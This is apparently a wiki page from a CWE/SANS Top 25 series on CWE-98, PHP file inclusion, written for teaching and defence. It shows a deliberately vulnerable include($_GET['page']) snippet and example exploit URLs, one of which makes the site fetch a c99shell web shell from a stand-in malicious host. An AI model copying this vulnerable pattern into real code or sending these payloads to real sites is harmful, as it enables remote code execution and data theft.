CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

Description

File inclusion attack is specific to PHP language. It consists of exploiting PHP inclusions (include, require, require_once, ...) to include arbitrary pages and commands.

Let's take an example. Suppose a PHP application contains following code:

<?php
/***
 * index.php?page=news
 */
include($_GET["page"].".php");
?>

A normal use would be to include internal pages:

http://www.site.com/index.php?page=page1
http://www.site.com/index.php?page=page2
http://www.site.com/index.php?page=news

But an attacker could easily exploit it to include non-excepted pages within the same application (LFI):

http://www.site.com/index.php?page=admin

or even worse, external pages from another site (RFI):

http://www.site.com/index.php?page=http://www.malicioussite.com/c99shell

Risk measurement

Weakness Prevalence	Common
Remediation Cost	Low to Medium
Attack Frequency	Often
Consequences	Code execution, Data loss
Ease of Detection	Easy
Attacker Awareness	High

Comments

Talk:CWE-SANS-Top-25/Risky-resource-management/CWE-98

CWE-SANS-Top-25/Risky-resource-management/CWE-98

Contents

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

Description

Risk measurement

Comments

Share your opinion

Navigation menu

CWE-SANS-Top-25/Risky-resource-management/CWE-98

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

Description

Risk measurement

Comments

Share your opinion

Navigation menu

Search